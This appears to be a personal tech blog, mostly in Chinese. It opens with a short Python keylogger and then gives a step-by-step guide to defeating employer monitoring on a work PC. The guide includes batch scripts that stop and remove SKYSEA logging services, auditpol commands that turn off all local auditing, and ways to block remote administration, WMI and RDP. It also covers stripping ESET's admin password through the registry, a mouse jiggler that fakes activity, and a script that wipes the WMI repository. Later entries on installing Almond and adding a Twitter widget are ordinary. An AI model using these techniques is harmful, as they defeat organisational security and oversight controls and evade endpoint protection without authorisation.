log_file = 'keylog.txt'

def on_press(key: keyboard.Key | keyboard.KeyCode | None) -> None:
    with open(log_file, 'a') as f:
        f.write(f'[{key}]')

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()

How to detect keyloggers?

Detecting keylogger programs on a computer usually involves fairly obvious warning signs: the browser slows down, there are delays when moving the mouse or typing, or the cursor disappears. Even if you use the best privacy browsers, keyloggers can still track your inputs.

How keyloggers infect your device?

Hackers often use social engineering methods to infect victims with keyloggers. A keylogger can infect your device in different ways, sometimes depending on your device type. And even though a spyware removal tool can handle keystroke logger detection, you want to avoid this dangerous type of malware to begin with.

Here’s the general process for how a keylogger infects your device:

  1. A cybercriminal sends an infected phishing message, usually through an email attachment, SMS message, or infected website.

  2. When you click the link for the infected website or attachment, the keylogger automatically downloads itself onto your device.

  3. The keystroke tracker immediately starts to collect your keystrokes, most likely without being detected until you run a keylogger scan.

如何检测键盘记录器?

检测计算机上键盘记录器程序的警告信号通常相当明显:浏览器变慢、鼠标移动或键击时出现延迟,或者光标消失。即使你使用最好的隐私浏览器,键盘记录器也能跟踪你的输入。

键盘记录器如何感染你的设备?

黑客通常使用社会工程学方法来感染受害者的设备。键盘记录器可以通过多种方式感染你的设备,这些方式有时取决于你的设备类型。虽然间谍软件清除工具可以处理键盘记录器的检测,但最好的办法是从一开始就避免这种危险的恶意软件。

以下是键盘记录器感染你设备的一般过程:

  1. 网络犯罪分子发送带有感染的钓鱼信息,通常通过电子邮件附件、短信或感染的网站进行发送。

  2. 当你点击感染网站的链接或附件时,键盘记录器会自动下载到你的设备上。

  3. 键盘记录器立即开始收集你的按键输入,通常在你运行键盘记录器扫描之前不会被发现。

SKYSEA 这个间谍软件的删除方法

  • Microsoft Policy Platform
  • Microsoft Endpoint Manager
    • Microsoft Endpoint Configuration Manager
      • Configuration Manager Remote Control Service
    • Microsoft Intune
      • Microsoft Intune Management Extension
  • Microsoft Azure Information Protection
  • Azure Monitor Agent

一、详细操作指南

社内PC上未经允许安装并获取操作日志的麻烦间谍软件。让我们根除这个间谍软件,提高生活质量(QoL)。

  1. 使用 RegistryFinder 删除注册表中所有包含 “skysea” 的项。也可以使用 regedit,但比较麻烦。

    删除注册表中 Key 列和 Value 列中包含 “SKYSEA” 的记录(右键点击 → 从注册表中删除)。

  2. 通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “Swd” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。

    删除 C:\WINDOWS 目录中的 “wds” 文件夹。

  3. 通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “awssm” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。

    删除 C:\WINDOWS 目录中的 “awssm” 文件夹。

  4. 将以下文本保存为 .bat 文件并运行。也可以手动停止和禁用服务。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    @echo off

    rem 禁用服务
    sc config "Swd" start= disabled
    sc config "awssm" start= disabled
    sc config "SCVCabProxySvr" start= disabled
    sc config "CompactSvc" start= disabled
    sc config "ScvUpdSvc" start= disabled
    sc config "AstExAgt" start= disabled
    sc config "ScvSvc" start= disabled
    sc config "SCV LogAgentService" start= disabled
    sc config "LogSvr" start= disabled
    sc config "IceSvc" start= disabled

    rem 停止服务
    net stop "Swd"
    net stop "awssm"
    net stop "SCVCabProxySvr"
    net stop "CompactSvc"
    net stop "ScvUpdSvc"
    net stop "AstExAgt"
    net stop "ScvSvc"
    net stop "SCV LogAgentService"
    net stop "LogSvr"
    net stop "IceSvc"

    因为各服务会进行活性监控,需要多次运行 bat 文件来完全停止它们。如果不行的话可以手动从服务界面停止。

  5. 打开任务管理器,右键点击 “SKYSEA Client View Version 16.1” → 结束任务。然后删除 C:\Program Files (x86) 目录中的 “Sky Product” 文件夹。如果无法删除,可能是服务未完全停止或者任务管理器中还有 “SKYSEA Client View Version 16.1”。

  6. 重启电脑,如果任务管理器中没有任何与 “SKYSEA” 相关的进程,说明删除成功。

结束监视社会。感谢这家公司,我连藤原竜也都讨厌了。

2023年10月15日更新

在多次停止服务后,系统部门又说『日志无法获取了』,我反复说『请远程安装』,然后删除了日志。但随着新版本的发布,他们要求重新安装。我本来不想安装,但最后不得不安装。安装后,他们又说『日志无法获取』,但我不在乎。

后来我再次尝试删除这个恶心的间谍软件,但 “C:\Program Files (x86)\Sky Product\SKYSEA Client View” 文件夹被占用,无法删除。因为不想查找具体是哪项服务占用,于是按照以下步骤进行处理:

  1. 右键点击 Windows 标志,选择 “运行”。
  2. 输入 “resmon.exe” 并点击 “确定”。
  3. 在资源监视器中,打开 “CPU” 选项卡。
  4. 展开 “关联的句柄” 部分。
  5. 在 “关联的句柄” 搜索框中输入 “SKYSEA Client View”。
  6. 等待搜索结果显示。
  7. 右键点击显示的进程,选择 “结束进程”。

即便是 Chrome 和 Outlook 也受到影响,这太恶心了。想到系统部门的老男人可能会窥探女性员工的搜索历史,真是太可怕了。

无法删除文件夹时,可以通过移除 administrators 权限并授予 everyone 完全控制权限来删除文件夹。

二、服务停止与启动脚本

昨天写的删除方法,其实不用删除注册表也可以停止服务。但是,如果想彻底清理,建议删除注册表项目。

因为有些公司可能会在删除后抱怨,所以我创建了停止和启动服务的 bat 文件。请在自担风险下使用。

服务停止.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
@echo off

rem 禁用服务并停止,移动模块
sc config "Swd" start= disabled
net stop "Swd"
move C:\Windows\wds C:\kasu\wds

sc config "awssm" start= disabled
net stop "awssm"
move C:\WINDOWS\avv5sm C:\kasu\avv5sm

rem 终止进程
taskkill /F /im CtlCli64.exe
taskkill /F /im LogChromeNativeHost.exe
taskkill /F /im AstAgent.exe
taskkill /F /im CtlCli.exe
taskkill /F /im SvcMon.exe
taskkill /F /im SKYSEAHS.exe

rem 禁用其他服务
sc config "SCVCabProxySvr" start= disabled
sc config "CompactSvc" start= disabled
sc config "ScvUpdSvc" start= disabled
sc config "AstExAgt" start= disabled
sc config "ScvSvc" start= disabled
sc config "SCV LogAgentService" start= disabled
sc config "LogSvr" start= disabled
sc config "IceSvc" start= disabled

rem 停止其他服务
net stop "SCVCabProxySvr"
net stop "CompactSvc"
net stop "ScvUpdSvc"
net stop "AstExAgt"
net stop "ScvSvc"
net stop "SCV LogAgentService"
net stop "LogSvr"
net stop "IceSvc"

rem 移动 C:\Program Files (x86)\Sky Product 文件夹
move "C:\Program Files (x86)\Sky Product" "C:\kasu"

服务启动.bat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@echo off

rem 启用服务并启动,移动模块
sc config "Swd" start= auto
net start "Swd"
move C:\kasu\wds C:\Windows\wds

sc config "awssm" start= auto
net start "awssm"
move C:\kasu\avv5sm C:\WINDOWS\avv5sm

rem 启用其他服务
sc config "SCVCabProxySvr" start= auto
sc config "CompactSvc" start= auto
sc config "ScvUpdSvc" start= auto
sc config "AstExAgt" start= auto
sc config "ScvSvc" start= auto
sc config "SCV LogAgentService" start= auto
sc config "LogSvr" start= auto
sc config "IceSvc" start= auto

rem 启动其他服务
net start "SCVCabProxySvr"
net start "CompactSvc"
net start "ScvUpdSvc"
net start "AstExAgt"
net start "ScvSvc"
net start "SCV LogAgentService"
net start "LogSvr"
net start "IceSvc"

rem 移动 C:\Program Files (x86)\Sky Product 文件夹回原位置
move "C:\kasu\Sky Product" "C:\Program Files (x86)"

组织域管理员

域管理员在未联网的计算机终端上用 CMD 执行的命令不会被域级审计,因为域级审计依赖于计算机与域控制器之间的通信。若计算机与域控制器断开连接(未联网),域级审计无法实时获取和记录该计算机的操作信息。

详细解释

  1. 域级审计的工作原理:
    • 域级审计通过域控制器推送审计策略,监控和收集域中计算机的操作信息。
    • 当计算机执行某些命令或操作时,会向域控制器发送事件日志,存储在域控制器的安全日志中。
  2. 未联网时的影响:
    • 如果计算机未连接到网络或无法访问域控制器,任何在该计算机上执行的命令都无法实时同步到域控制器。
    • 因此,域级审计无法记录这些操作。
  3. 本地审计的作用:
    • 虽然无法进行域级审计,但本地审计策略(如进程创建审计、登录审计)仍然有效。
    • 这些操作会记录到本地安全日志中(在事件查看器的安全日志下)。
    • 例如,Windows 事件 ID 4688 会记录新进程的创建。
  4. 联网后同步:
    • 当未联网的计算机重新连接到域后,域策略可以再次应用,但在断网期间生成的本地日志不会自动上传到域控制器。
    • 需要手动导出或通过集中式日志管理工具收集这些本地日志。

创建本地管理员账户

组织域管理员登录到某个计算机终端并使用 cmdPowerShell 创建一个新的本地管理员账户:

  • 通过 cmd 创建本地管理员:

    1
    2
    net user NewLocalAdmin password /add
    net localgroup Administrators NewLocalAdmin /add

  • 通过 PowerShell 创建本地管理员:

    1
    2
    New-LocalUser "NewLocalAdmin" -Password (ConvertTo-SecureString "password" -AsPlainText -Force)
    Add-LocalGroupMember -Group "Administrators" -Member "NewLocalAdmin"

这会在本地计算机上创建一个名为 NewLocalAdmin 的用户,并将其添加到 Administrators 组中,从而赋予该账户管理员权限。

删除本地管理员账户

假设你希望任务在 2024 年 12 月 25 日午夜 12 点删除本地管理员账户,可以按照如下方式创建任务:

1
schtasks /create /tn "DeleteCurrentAdmin" /tr "net user CurrentAdmin /delete" /sc once /st 00:00 /sd 12/25/2024

解释:

  • /sc once:表示这是一个只执行一次的任务。
  • /st 00:00:设定任务的开始时间为午夜12点(00:00)。
  • /sd 12/25/2024:指定任务的具体日期为 2024 年 12 月 25 日。

这样,任务将在指定的日期和时间执行并删除本地管理员账户。

禁用本地审计

要在 Windows 系统上禁用本地审计,可以通过本地组策略编辑器或命令行工具来进行。以下是两种常见方法:

方法 1:使用本地组策略编辑器禁用本地审计

  1. 打开本地组策略编辑器:
    • 按下 Win + R,输入 gpedit.msc,然后按 Enter。
  2. 导航到审计策略:
    • 路径:计算机配置 → Windows 设置 → 安全设置 → 本地策略 → 审核策略。
  3. 禁用所需的审计项:
    • 在右侧面板中找到需要禁用的审计项(例如登录审核、对象访问审核、进程创建审核等)。
    • 双击需要禁用的项,在弹出的窗口中选择不审核,然后点击确定。
  4. 应用更改:
    • 关闭组策略编辑器,重启计算机或运行以下命令以使更改生效:
1
gpupdate /force

方法 2:使用命令行工具禁用本地审计

可以使用 auditpol 命令来禁用特定的审计策略。

  • 查看当前的审计策略

在命令提示符或 PowerShell 中,运行以下命令查看当前的审计策略:

1
auditpol /get /category:*
  • 禁用特定审计项

要禁用特定审计项(例如登录/注销类别下的所有审核),可以使用以下命令:

1
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
  • 禁用所有审计项

要禁用所有审计类别的审计,可以逐项禁用,或者使用批处理命令:

1
for /f "tokens=*" %a in ('auditpol /get /category:* ^| findstr /r "^[A-Z]"') do auditpol /set /category:"%a" /success:disable /failure:disable
  • 注意事项
  1. 权限要求:
    • 修改审计策略需要管理员权限,请确保在具有管理员权限的账户下执行这些操作。
  2. 安全风险:
    • 禁用本地审计会使系统无法记录安全事件和用户活动,可能导致安全风险,降低问题排查和安全合规性。
  3. 重新启用审计:
    • 如果需要重新启用本地审计,可以通过组策略编辑器将相关项设置为成功审核或失败审核,或者使用 auditpol 命令启用。

示例命令重新启用审计:

1
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable

通过这些方法,可以有效控制本地审计的启用和禁用。

禁用 Windows 远程管理

Windows 远程管理涉及多个功能,如 PowerShell 远程远程桌面 和 **Windows 远程管理服务 (WinRM)**。您可以逐一禁用这些功能。

禁用 PowerShell 远程

PowerShell 中运行以下命令来禁用 PowerShell 远程功能:

1
Disable-PSRemoting -Force

禁用远程桌面 (RDP)

  1. 通过设置禁用远程桌面:

    • Win + I 打开 设置
    • 选择 系统 -> 远程桌面
    • 启用远程桌面 选项关闭。

  2. 通过命令提示符禁用远程桌面:
    打开命令提示符(管理员权限),运行以下命令:

    1
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

  3. 停止远程桌面服务:

    1
    2
    sc stop TermService
    sc config TermService start= disabled

禁用 Windows Management Instrumentation (WMI)

PowerShell Remoting 依赖于 WMI(Windows Management Instrumentation)来查询计算机的状态。禁用 WMI 服务可以防止通过 WMI 查询用户和权限。

在 PowerShell 中执行以下命令禁用 WMI 服务:

1
2
Stop-Service -Name winmgmt
Set-Service -Name winmgmt -StartupType Disabled

或者,在 服务管理器 中手动禁用 Windows Management Instrumentation 服务。

如何检查和设置 WMI 权限:

  • 可使用 Component Services 或 WMI Control 控制台来查看和配置 WMI 的访问权限。
  • 步骤:
    1. 打开 compmgmt.msc(计算机管理)。
    2. 导航到 Services and Applications > WMI Control。
    3. 右键点击 WMI Control,选择 Properties。
    4. 在 Security 选项卡中,可以查看和配置 WMI 命名空间的权限。

禁用 SMB 协议

为了防止远程查看和管理,可以禁用 Server Message Block (SMB) 协议。

禁用 SMB1 协议SMB2 协议

1
2
Set-SmbServerConfiguration -EnableSMB1Protocol $false
Set-SmbServerConfiguration -EnableSMB2Protocol $false

禁用 WinRM 服务(远程管理服务)

在命令提示符或 PowerShell 中,运行以下命令:

1
2
3
4
5
# 停止 WinRM 服务
Stop-Service WinRM

# 禁用 WinRM 服务开机启动
Set-Service -Name WinRM -StartupType Disabled

配置防火墙规则

通过配置防火墙规则,可以阻止来自特定 IP 或网络的远程访问。

  • 手动创建防火墙端口规则:

通过防火墙限制远程连接,特别是禁用 PowerShell RemotingWMI 查询:

  1. 打开 Windows 防火墙
  2. 创建新的出站或入站规则,阻止端口 5985 (HTTP) 和 5986 (HTTPS),这两个端口是 PowerShell Remoting 和 WMI 查询的默认端口。
  • 通过执行命令,配置阻止远程管理端口的规则。
1
New-NetFirewallRule -DisplayName "Block PowerShell Remoting" -Direction Inbound -Protocol TCP -LocalPort 5985,5986 -Action Block
  • 通过执行命令,配置阻止 RDP(远程桌面协议)端口的规则。
1
New-NetFirewallRule -DisplayName "Block RDP" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Block

禁用 Remote Registry 服务

Remote Registry 服务允许远程计算机访问本地注册表,进而查看用户和权限信息。
禁用 Remote Registry 服务可以防止远程用户访问计算机的注册表,查看或修改用户信息、权限等。

  1. 打开 服务管理器,找到 Remote Registry 服务。
  2. 禁用该服务,并将启动类型设置为 禁用

或者,你可以在 PowerShell 中执行以下命令禁用服务:

1
2
Stop-Service -Name RemoteRegistry
Set-Service -Name RemoteRegistry -StartupType Disabled

使用组策略限制权限

通过 组策略(GPO)来限制域管理员的远程访问权限,禁止某些账户或组执行特定操作。

  • 禁止远程管理
  1. 打开 组策略编辑器gpedit.msc)。
  2. 导航到 计算机配置 -> 管理模板 -> Windows 组件 -> Windows PowerShell
  3. 启用 禁用远程脚本 策略,以防止通过 PowerShell 远程执行脚本。
  • 限制管理员权限

你还可以限制某些管理员的权限,限制其在目标计算机上的操作。通过组策略,你可以定义哪些用户组可以执行管理任务。

禁用登录脚本和远程任务

禁用目标计算机的登录脚本和计划任务可以防止域管理员通过这些方式远程监视计算机。

  • 禁用计划任务
  1. 打开 任务计划程序
  2. 禁用或删除与远程监控相关的计划任务。

卸载或禁用 ESET Security

ESET Security 是防病毒和安全保护软件,禁用或卸载它需要一定的步骤和权限,特别是在企业环境中可能会受到策略限制。
如果您没有 ESET Security 的管理员密码,但需要禁用或卸载它,可以尝试以下方法。不过请注意,在公司设备上这样做可能违反 IT 政策,需谨慎操作。

方法 1: 使用 ESET 卸载工具(在安全模式下)

ESET 提供了专门的卸载工具,可以在 安全模式 下强制卸载 ESET Security,绕过管理员密码。

步骤:

  1. 下载 ESET Uninstaller 工具:

  2. 进入安全模式:

    • Win + R,输入 msconfig,按回车。
    • 引导 选项卡中,勾选 安全引导,然后点击 确定 并重启电脑。

  3. 运行 ESET Uninstaller 工具:

    • 在安全模式下,运行下载的 ESET Uninstaller 工具 (ESETUninstaller.exe)。
    • 按照提示,输入确认信息并选择要卸载的 ESET 产品。
    • 等待卸载完成。

  4. 重新启动电脑

    • 卸载完成后,重新启动电脑并返回正常模式。
    • 记得取消 安全引导 选项(在 msconfig 中取消勾选 安全引导)。

方法 2: 通过注册表重置 ESET 管理员密码

您可以尝试通过修改注册表来重置或移除 ESET Security 的管理员密码。

步骤:

  1. 打开注册表编辑器:

    • Win + R,输入 regedit,然后按回车。

  2. 定位到 ESET 密码存储路径:

    • 路径:
      1
      HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
    • 在部分版本中,路径可能略有不同。

  3. 删除密码值:

    • 找到名为 PasswordAdminPassword 的项。
    • 右键点击该项,选择 删除
    • 关闭注册表编辑器。

  4. 重启电脑

    • 重启后,尝试打开 ESET Security,密码应该被移除。

方法 3: 通过任务管理器禁用 ESET 启动项和服务

  1. 打开任务管理器:

    • Ctrl + Shift + Esc

  2. 禁用启动项:

    • 转到 启动 选项卡。
    • 找到 ESET Security,右键点击并选择 禁用

  3. 禁用 ESET 服务:

    • 转到 服务 选项卡。
    • 找到所有与 ESET 相关的服务,右键点击,选择 停止
    • Win + R,输入 services.msc,回车。
    • 在服务列表中找到 ESET 服务,右键选择 属性,将 启动类型 设置为 禁用

让 Chromium 使用系统托盘运行(第三方工具)

Windows 本身不支持直接将 Chromium 或者 Vivaldi 移动到托盘(右下角通知区域)。但可以使用第三方工具,如 RBTrayTrayIt!,将 Chromium 最小化到系统托盘中:

  1. 下载并运行 RBTray(无需安装)。
  2. 打开 Chromium 后,用右键单击窗口右上角的最小化按钮。
  3. Chromium 图标将最小化到托盘。

查看 Microsoft Purview 扩展 和 Microsoft Single Sign-On (SSO) 插件在 Chrome 浏览器中何时部署:

  1. 打开以下目录:
    1
    %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions
  2. 找到扩展的文件夹(通过扩展程序 ID)。
    • 你可以在 chrome://extensions/ 页面中找到扩展 ID。
  3. 右键扩展文件夹,选择 属性
  4. 创建时间 中查看扩展的初始安装时间。

让 iPhone 通过 USB 分享网络给 Windows 11:

  • 安装 AppleMobileDeviceSupport
  • 打开 控制面板网络和共享中心更改适配器设置
  • 你应该能够看到 Apple Mobile Device Ethernet 或类似名称的适配器,这表示 iPhone 正在通过 USB 共享网络。
  • 如果看到该适配器,右键点击它并选择 启用

使用 MyPublicWiFi 创建虚拟无线路由器:

  • 特点:
    • 提供创建无线局域网和网络监控功能。
    • 无需依赖 Hosted Network 支持。
  • 适用情况:
    • 支持较旧的 Windows 系统和大部分无线网卡。

Windows 11 中开启移动热点

  1. 按下 Win + I 打开设置,或者点击开始菜单,选择设置
  2. 在设置界面,选择左侧菜单中的网络和互联网
  3. 网络和互联网页面中,找到并点击移动热点
  4. 选择网络连接来源
    • 共享我的互联网连接下拉菜单中,选择用于共享的网络连接来源(例如 Wi-Fi 或以太网)。
  5. 配置网络名称和密码(可选)
    • 点击编辑按钮,设置你的热点名称(SSID)和密码。确保密码满足至少8位字符的要求。
  6. 移动热点开关切换到的状态。
  7. 系统会显示热点的网络名称和密码,你可以使用其他设备连接到此热点。
  8. 在移动热点设置页面,可以查看并管理连接到热点的设备。

使用 Pi-Hole-for-WSL1 阻塞网络监控通信:

1
2
3
4
5
pihole -b self.events.data.microsoft.com
pihole -b teams.events.data.microsoft.com
pihole -b browser-intake-datadoghq.com
pihole -b dns.msftncsi.com
pihole -b msftconnecttest.com
1
pihole restartdns
1
pihole -t
1
ipconfig /flushdns

圆周运动

In [ ]:
%%bash
pip install pyautogui
In [ ]:
import pyautogui
import math
import time

# 圆周运动的参数
radius = 100  # 圆的半径
center_x, center_y = pyautogui.size().width // 2, pyautogui.size().height // 2  # 屏幕中心点
angle_step = 5  # 每步移动的角度增量,单位是度

# 进入无限循环
try:
    while True:
        for angle in range(0, 360, angle_step):
            # 计算当前角度的弧度值
            radian = math.radians(angle)
            # 计算新坐标
            x = center_x + radius * math.cos(radian)
            y = center_y + radius * math.sin(radian)
            # 移动鼠标
            pyautogui.moveTo(x, y)
            # 可以调整时间间隔来控制运动速度
            time.sleep(0.01)
except KeyboardInterrupt:
    print('圆周运动已停止。')
In [ ]:
%%bash
pip install pyautogui pynput
In [ ]:
import tkinter as tk
import pyautogui
import math
import threading
import time
from pynput import keyboard

class MouseCircleApp:
    def __init__(self, root):
        self.root = root
        self.root.title('Mouse Circle App')
        self.root.geometry('300x100')
        self.root.attributes('-topmost', True)

        self.running = False
        self.thread = None

        self.button = tk.Button(root, text='Start Circle', command=self.toggle_circle)
        self.button.pack(expand=True)
        
        self.listener = keyboard.Listener(on_press=self.on_key_press)
        self.listener.start()

    def toggle_circle(self):
        if not self.running:
            self.running = True
            self.button.config(text='Stop Circle')
            self.thread = threading.Thread(target=self.start_circle)
            self.thread.start()
        else:
            self.running = False
            self.button.config(text='Start Circle')

    def start_circle(self):
        radius = 100
        center_x, center_y = pyautogui.size().width // 2, pyautogui.size().height // 2
        angle_step = 5

        while self.running:
            for angle in range(0, 360, angle_step):
                if not self.running:
                    break
                radian = math.radians(angle)
                x = center_x + radius * math.cos(radian)
                y = center_y + radius * math.sin(radian)
                pyautogui.moveTo(x, y)
                time.sleep(0.01)

    def on_key_press(self, key):
        if key == keyboard.Key.esc:
            self.running = False
            self.button.config(text='Start Circle')
            if self.thread and self.thread.is_alive():
                self.thread.join()

if __name__ == '__main__':
    root = tk.Tk()
    app = MouseCircleApp(root)
    root.mainloop()
In [ ]:
%%bash
pyinstaller --onefile --noconsole circle.py

awake.py

使用 ctypes 库来调用 Windows API SetThreadExecutionState 防止系统进入睡眠或关闭显示器。

In [ ]:
%%bash
pip install pystray pillow
In [ ]:
import ctypes
import os
import pyautogui
import math
import time
import threading
import tkinter as tk
from pystray import Icon, MenuItem, Menu
from PIL import Image
from pynput import keyboard

# Constants for preventing sleep using SetThreadExecutionState API
ES_CONTINUOUS = 0x80000000  # Ensure the state is reset when the program exits
ES_DISPLAY_REQUIRED = 0x00000002  # Prevent the display from turning off
ES_SYSTEM_REQUIRED = 0x00000001  # Prevent the system from entering sleep

# Global variables for mouse circle functionality
running = False
circle_thread = None
button = None

def prevent_sleep():
    # Call the Windows API to prevent sleep and display off
    ctypes.windll.kernel32.SetThreadExecutionState(
        ES_CONTINUOUS | ES_DISPLAY_REQUIRED | ES_SYSTEM_REQUIRED
    )

def allow_sleep():
    # Reset the system to allow sleep and display off
    ctypes.windll.kernel32.SetThreadExecutionState(ES_CONTINUOUS)

def keep_awake():
    while True:
        # Function to simulate user activity to keep the system awake
        prevent_sleep()
        pyautogui.move(1, 0)  # Slight mouse movement to prevent idle state
        pyautogui.move(-1, 0)  # Move back to original position
        time.sleep(60 * 3)  # Sleep for 3 minutes before repeating

def on_quit(icon, root):
    # Handle the quit action from the system tray menu
    icon.stop()  # Stop the tray icon
    allow_sleep()  # Allow the system to sleep again
    root.quit()  # Quit the Tkinter main loop
    os._exit(0)  # Ensure the process exits completely

def show_window(root):
    # Show the main application window
    root.deiconify()
    root.attributes('-topmost', True)  # Bring the window to the front

def hide_window(root):
    # Hide the main application window
    root.withdraw()

def create_tray_icon(root):
    # Create a system tray icon with a menu
    image = Image.new('RGB', (64, 64), color=(0, 0, 0))  # Simple black icon
    menu = Menu(
        MenuItem('Open Window', lambda icon, item: show_window(root), default=True),
        MenuItem('Exit', lambda icon, item: on_quit(icon, root))
    )
    return Icon('Awake', image, 'Keep Awake', menu)

def toggle_circle(button):
    global running, circle_thread
    if not running:
        button.config(text='Stop Circle')
        # Start the circle motion
        running = True
        circle_thread = threading.Thread(target=start_circle)
        circle_thread.start()
    else:
        button.config(text='Start Circle')
        # Stop the circle motion
        running = False
        if circle_thread and circle_thread.is_alive():
            circle_thread.join()

def start_circle():
    global running
    radius = 100
    center_x, center_y = pyautogui.size().width // 2, pyautogui.size().height // 2
    angle_step = 5

    while running:
        for angle in range(0, 360, angle_step):
            if not running:
                break
            radian = math.radians(angle)
            x = center_x + radius * math.cos(radian)
            y = center_y + radius * math.sin(radian)
            pyautogui.moveTo(x, y)
            time.sleep(0.01)

def on_key_press(key):
    global button
    if key == keyboard.Key.esc:
        toggle_circle(button)

def main():
    # Set up the main Tkinter window
    root = tk.Tk()
    root.title('Awake & Circle')
    root.geometry('350x100')
    root.resizable(False, False)  # Fix the window size
    root.attributes('-topmost', True)  # Keep the window on top
    root.protocol('WM_DELETE_WINDOW', lambda: hide_window(root))  # Hide on close

    # Create the mouse circle button in the main window
    global button
    button = tk.Button(root, text='Start Circle', command=lambda: toggle_circle(button))
    button.pack(expand=True)

    # Start a background thread to keep the system awake
    threading.Thread(target=keep_awake, daemon=True).start()

    # Start the keyboard listener
    listener = keyboard.Listener(on_press=on_key_press)
    listener.start()

    # Create and run the system tray icon
    icon = create_tray_icon(root)
    threading.Thread(target=icon.run, daemon=True).start()

    # Run the Tkinter main loop
    root.mainloop()

if __name__ == '__main__':
    main()

说明:

  1. SetThreadExecutionState

    • ES_CONTINUOUS:保持该设置直到下一次调用。
    • ES_DISPLAY_REQUIRED:防止屏幕关闭。
    • ES_SYSTEM_REQUIRED:防止系统进入睡眠。

  2. 防止和恢复

    • prevent_sleep():调用后,系统不会进入睡眠或关闭显示器。
    • allow_sleep():调用后恢复系统默认的电源管理设置。

  3. 运行和停止

    • 运行脚本后,它会每分钟保持系统活跃,防止自动熄屏和锁屏。
    • 使用 Esc 和菜单选项 Exit 停止脚本运行,并恢复系统默认设置。

注意:

  • 这个脚本仅在 Windows 操作系统上有效。
  • SetThreadExecutionState 是 Windows 提供的 API,用于管理电源和系统状态。务必小心使用,防止意外阻止系统进入节能状态。
In [ ]:
%%bash
pyinstaller --onefile --noconsole awake.py

setup.py

In [ ]:
from setuptools import setup
from mypyc.build import mypycify

setup(
    name='awake',
    ext_modules=mypycify(['awake.py']),
    zip_safe=False,
)
In [ ]:
%%bash
pip install mypy
In [ ]:
%%bash
python setup.py build_ext --inplace

main.py

In [ ]:
import awake

if __name__ == '__main__':
    awake.main()  # 调用编译后的模块的 main 函数
In [ ]:
%%bash
pyinstaller --onefile main.py

WMI 服务管理与清理自动化

In [ ]:
import os
import shutil
import subprocess

def stop_and_disable_service(service_name):
    '''停止并禁用指定的服务'''
    try:
        # 停止服务
        subprocess.run(['sc', 'stop', service_name], check=True, text=True)
        print(f'服务已停止:{service_name}')

        # 禁用服务
        subprocess.run(['sc', 'config', service_name, 'start=', 'disabled'], check=True, text=True)
        print(f'服务已禁用:{service_name}')
    except subprocess.CalledProcessError as e:
        print(f'操作服务 {service_name} 时发生错误:{e}')

def clear_folder_contents(folder_path):
    '''清理文件夹下的所有内容'''
    if os.path.exists(folder_path):
        try:
            # 删除文件夹下的所有文件和子目录
            for item in os.listdir(folder_path):
                item_path = os.path.join(folder_path, item)
                if os.path.isdir(item_path):
                    shutil.rmtree(item_path)
                else:
                    os.remove(item_path)
            print(f'成功清理文件夹内容:{folder_path}')
        except Exception as e:
            print(f'清理文件夹 {folder_path} 时发生错误:{e}')
    else:
        print(f'路径不存在:{folder_path}')

if __name__ == '__main__':
    # 停止并禁用服务
    stop_and_disable_service('winmgmt')
    stop_and_disable_service('CcmExec')

    # 定义文件夹路径
    wbem_base_path = r'C:\\Windows\\System32\\wbem'
    auto_recover_path = os.path.join(wbem_base_path, 'AutoRecover')
    repository_path = os.path.join(wbem_base_path, 'Repository')
    remote_control_path = r'C:\\Windows\\CCM\\RemCtrl'

    # 清理 wbem/AutoRecover 和 wbem/Repository 文件夹
    clear_folder_contents(auto_recover_path)
    clear_folder_contents(repository_path)
    # 清理 CCM/RemCtrl 文件夹
    clear_folder_contents(remote_control_path)
Read More

2021-11-07
Install Almond

In [ ]:
java -version

openjdk version "1.8.0_312"
OpenJDK Runtime Environment (Temurin)(build 1.8.0_312-b07)
OpenJDK 64-Bit Server VM (Temurin)(build 25.312-b07, mixed mode)
In [ ]:
curl -Lo coursier https://git.io/coursier-cli
chmod +x coursier
./coursier launch -v -v almond -- --install
./coursier launch --fork --main-class almond.ScalaKernel almond -- --install

<fork>true</fork>
  • true means it will create (fork) a new JVM to run the compiler. This is a bit slower but the isolation is better.
  • false means it is startign the compiler directly in the JVM you have run maven with, this makes the build less repeatable.
In [ ]:
rm -f coursier
Read More

2021-10-28
Add Tweets to My Blog

Browser Side

In [ ]:
cat hexo/themes/freemind/_config.yml
In [ ]:
cat hexo/themes/freemind/layout/_widget/links.ejs
In [ ]:
cat hexo/themes/freemind/source/js/twitter.js

var twitter = (function() {
  function escapeHtml(str) {
    return $('<div/>').text(str).html();
  }
  function render(target, tweets) {
    var i = 0, fragment = '', t = $(target)[0];

    for(i = 0; i < tweets.length; ++i) {
      fragment += '<li><i class="fa fa-star"></i><a href="https://twitter.com/seii_saintway/status/' + tweets[i].id + '">'
          + tweets[i].created_at.replace('T', ' ').replace('.000Z', '') + '</a><p>' + escapeHtml(tweets[i].text||'') + '</p></li>';
    }
    t.innerHTML = fragment;
  }
  return {
    showTweets: function(options) {
      options.blacklist = options.blacklist.split(',');
      $.ajax({
          url: 'https://jhub.name/tweets/?tweet.fields=created_at&max_results=' + options.count
        , dataType: 'json'
        , error: function (err) { $(options.target + ' li.loading').addClass('error').text('Error loading feed'); }
        , success: function (data) {
          if (!data ) { return; }
          var tweets = [];
          for (var i = 0; i < data.data.length; ++i) {
            if (options.blacklist instanceof Array && options.blacklist.indexOf(data.data[i].id) !== -1) { continue; }
            tweets.push(data.data[i]);
          }
          render(options.target, tweets);
        }
      });
    }
  };
})();
  • Here is all the changes at the browser side.

Server Side

